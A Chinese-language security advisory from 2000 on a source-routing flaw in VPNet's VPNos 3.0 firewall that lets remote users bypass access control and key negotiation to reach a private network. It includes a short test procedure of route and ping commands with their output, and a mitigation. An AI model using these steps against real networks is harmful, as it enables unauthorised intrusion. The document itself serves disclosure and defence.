VPNet VSU 源路由会话漏洞
发布日期:2000-12-08
更新日期:2000-12-08
受影响系统:
VPNet Technologies VPNos 3.0
描述:
VPNos 是由 VPNet technologies 开发的防火墙,用于他们
的 VPN Service Units (VSUs)。该防火墙中存在一个问题,
使得远程用户可以进行非授权访问。
问题发生在进行源路会话时。通过在发包时把所有包设置成
源路由包,并且源路由中包括 VSU 的 IP 地址,有可能绕过
所有的访问控制和密钥协商启动一个会话访问私有网。通过
这种方式,有可能既可用 ICMP 有可用 TCP 与私有网内部的
主机进行通讯。这种状况使得恶意用户与私有网内部的主机
进行通讯或对之攻击成为可能。
<* 来源:F8 labs advisory *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1. 加一个 IP 别名到源主机的 NIC 中去,例如 192.168.0.5
2. 增加一个路由:
[root@moo /]# route add -net 192.168.0.0/16 gw 192.168.0.5
3. 检查连接状态:
[root@moo /]# ping 192.168.0.3
PING 192.168.0.3 (192.168.0.3) from 192.168.0.5 : 56(84) bytes of data.
64 bytes from 192.168.0.3: icmp_seq=0 ttl=255 time=0.7 ms
64 bytes from 192.168.0.3: icmp_seq=1 ttl=255 time=0.6 ms
64 bytes from 192.168.0.3: icmp_seq=2 ttl=255 time=0.6 ms
--- 192.168.0.3 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 0.6/0.6/0.7 ms
[root@moo /]#
建议:
临时解决办法:
NSFOCUS建议您在没有升级版本或给漏洞打上补丁前暂时禁止
源路由访问。
厂商补丁:
暂无
浏览次数:5686
严重程度:0(网友投票)